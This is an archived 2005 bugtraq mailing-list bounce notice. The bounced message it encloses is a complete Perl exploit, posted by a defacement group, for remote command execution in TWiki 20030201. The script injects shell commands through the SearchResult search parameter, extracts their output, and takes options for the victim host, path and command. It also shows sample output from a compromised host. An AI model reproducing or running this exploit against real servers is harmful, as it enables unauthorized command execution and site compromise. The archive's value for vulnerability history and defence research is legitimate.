[41272] in bugtraq
ezmlm warning
daemon@ATHENA.MIT.EDU (bugtraq-help@securityfocus.com)
Mon Nov 21 13:19:33 2005
Date: 21 Nov 2005 11:55:44 -0000
Message-ID: <1132574144.32385.ezmlm-warn@securityfocus.com>
From: bugtraq-help@securityfocus.com
To: bugtraq-redist@mit.edu
Content-type: text/plain; charset=us-ascii
Hi! This is the ezmlm program. I'm managing the
bugtraq@securityfocus.com mailing list.
I'm working for my owner, who can be reached
at bugtraq-owner@securityfocus.com.
Messages to you from the bugtraq mailing list seem to
have been bouncing. I've attached a copy of the first bounce
message I received.
If this message bounces too, I will send you a probe. If the probe bounces,
I will remove your address from the bugtraq mailing list,
without further notice.
I've kept a list of which messages from the bugtraq mailing list have
bounced from your address.
Copies of these messages may be in the archive.
To retrieve a set of messages 123-145 (a maximum of 100 per request),
send an empty message to:
<bugtraq-get.123_145@securityfocus.com>
To receive a subject and author list for the last 100 or so messages,
send an empty message to:
<bugtraq-index@securityfocus.com>
Here are the message numbers:
21990
--- Enclosed is a copy of the bounce message I received.
Return-Path: <>
Received: (qmail 19959 invoked from network); 9 Nov 2005 16:25:56 -0000
Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) (205.206.231.27)
by lists2.securityfocus.com with SMTP; 9 Nov 2005 16:25:56 -0000
Received: from mail.securityfocus.com (mail.securityfocus.com [205.206.231.9])
by outgoing3.securityfocus.com (Postfix) with SMTP id 1D9D8238A10
for <bugtraq-return-21990-bugtraq-redist=mit.edu@lists2.securityfocus.com>; Wed, 9 Nov 2005 15:14:27 -0700 (MST)
Received: (qmail 5534 invoked by alias); 9 Nov 2005 22:44:47 -0000
Received: (qmail 3591 invoked from network); 9 Nov 2005 22:44:25 -0000
Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) (205.206.231.27)
by mail.securityfocus.com with SMTP; 9 Nov 2005 22:44:25 -0000
Received: by outgoing3.securityfocus.com (Postfix)
id 99F4D23893A; Wed, 9 Nov 2005 15:13:37 -0700 (MST)
Date: Wed, 9 Nov 2005 15:13:37 -0700 (MST)
From: MAILER-DAEMON@securityfocus.com (Mail Delivery System)
Subject: Undelivered Mail Returned to Sender
To: bugtraq-return-21990-bugtraq-redist=mit.edu@securityfocus.com
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
boundary="92A5423A164.1131574411/outgoing3.securityfocus.com"
Content-Transfer-Encoding: 8bit
Message-Id: <20051109221337.99F4D23893A@outgoing3.securityfocus.com>
This is a MIME-encapsulated message.
--92A5423A164.1131574411/outgoing3.securityfocus.com
Content-Description: Notification
Content-Type: text/plain
This is the Postfix program at host outgoing3.securityfocus.com.
I'm sorry to have to inform you that your message could not be
be delivered to one or more recipients. It's attached below.
For further assistance, please send mail to <postmaster>
If you do so, please include this problem report. You can
delete your own text from the attached returned message.
The Postfix program
<bugtraq-redist@mit.edu>: host PACIFIC-CARRIER-ANNEX.mit.edu[18.7.21.83] said:
554 5.7.1 Message contains New UNIX virus, not accepted (in reply to end of
DATA command)
--92A5423A164.1131574411/outgoing3.securityfocus.com
Content-Description: Delivery report
Content-Type: message/delivery-status
Reporting-MTA: dns; outgoing3.securityfocus.com
X-Postfix-Queue-ID: 92A5423A164
X-Postfix-Sender: rfc822; bugtraq-return-21990@securityfocus.com
Arrival-Date: Mon, 7 Nov 2005 14:07:22 -0700 (MST)
Final-Recipient: rfc822; bugtraq-redist@mit.edu
Action: failed
Status: 4.0.0
Diagnostic-Code: X-Postfix; host PACIFIC-CARRIER-ANNEX.mit.edu[18.7.21.83]
said: 554 5.7.1 Message contains New UNIX virus, not accepted (in reply to
end of DATA command)
--92A5423A164.1131574411/outgoing3.securityfocus.com
Content-Description: Undelivered Message
Content-Type: message/rfc822
Content-Transfer-Encoding: 8bit
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 92A5423A164; Mon, 7 Nov 2005 14:07:22 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 3468 invoked from network); 6 Nov 2005 20:00:33 -0000
Date: 7 Nov 2005 02:29:59 -0000
Message-ID: <20051107022959.363.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: GeekZ@securityfocus.com, "[at]"@securityfocus.com,
WorldDefacers@securityfocus.com, "[d0t]"@securityfocus.com,
NeT@securityfocus.com
To: bugtraq@securityfocus.com
Subject: TWiki 20030201 VIEW string remote command execution
#!/usr/bin/perl
#
# TWiki 20030201 VIEW string remote command execution
vulnerability
#
# Exploit coded by runvirus GeekZ[at]WorldDefacers[d0t]NeT
#
#
# [root@localhost perls]$ perl twikiview.pl -h www.victim.com
-p twiki/bin/view/TWiki/ -c "uname -a;id"
#
#
# -=[ TWiki :- view string remote command execution exploit
]=-
# -=[ Coded by rUnViRuS
]=-
# -=[ HOST:- www.worlddefacers.net www.secuirty-arab.com
]=-
#
# bash-2.05b --> uname -a;id
#
# Linux infong225 2.4.28-grsec-20050113a #1 SMP Thu Jan 13
08:59:31 CET 2005 i686 unknown
# uid=16704(u36561933) gid=600(ftpusers)
#
#
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
###################################################################
########################
use Net::HTTP;
use Getopt::Std; getopts('h:p:c:', \%args);
if (defined($args{'h'})) { $host = $args{'h'}; }
if (defined($args{'p'})) { $path = $args{'p'}; }
if (defined($args{'c'})) { $thecmd = $args{'c'};}else{$thecmd = "
uname -a;id";}
print STDERR "\n-=[ TWiki 20030201 VIEW string remote command
execution vulnerability ]=-\n";
print STDERR "-=[ HOST:- www.worlddefacers.net www.secuirty-
arab.com ]=-\n";
print STDERR "-=[ Coded by rUnViRuS
]=-\n\n";
if ((!defined($host)) || (!defined($path))) {
Usage();
}
print "bash-2.05b --> $thecmd\n\n";
my $s = Net::HTTP->new(Host => "$host") || die $@;
my $thecmd=URLEncode($thecmd);
my $count=0;
my $skip=0;
my $buf2;
my $exploit="?topic=doesnotexist1%27%3B+%28$thecmd%29+%7C+sed+%27
s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l
+--+%27doesnotexist2";
$s->write_request(GET => $path . "SearchResult?search=" .
$exploit, 'User-Agent' => "Mozilla/5.0");
my($code, $mess, %h) = $s->read_response_headers;
# ..,,;:: Procedura di parsing
while (1) {
my $buf;
my $n = $s->read_entity_body($buf, 1024);
die "read failed: $!" unless defined $n;
last unless $n;
$buf2 = $buf2 . $buf;
}
while (index($buf2,"__BEGIN__",$skip) != -1) {
$from = index($buf2,"__BEGIN__",$skip);
$count = $count +1;
$from = $from + 9;
$to = index($buf2,"__END__",$skip);
$skip = $to+7;
$chars = $to - $from;
$grab = substr($buf2, $from, $chars);
if (($grab ne $oldgrab) && ($count != 1)){
print "$grab\n";
}
$oldgrab = $grab;
}
if ( $count <= 1 ){
print "Host not vulnerable\n";
}
# ..,,;:: Procedura di encoding strarippata da snooq
sub URLEncode {
my $theURL=$_[0];
$theURL=~ s/([\W])/"%".uc(sprintf("%2.2x",ord($1)))/eg;
return $theURL;
}
sub Usage {
print STDERR "-=[ Options: twikiview.pl -h www.exmpl.com -p
]=-
-=[ -h Victim host .
]=-
-=[ -p Twiki path.
]=-
-=[ -c Command.
]=-\n\n";
exit;
}
--92A5423A164.1131574411/outgoing3.securityfocus.com--
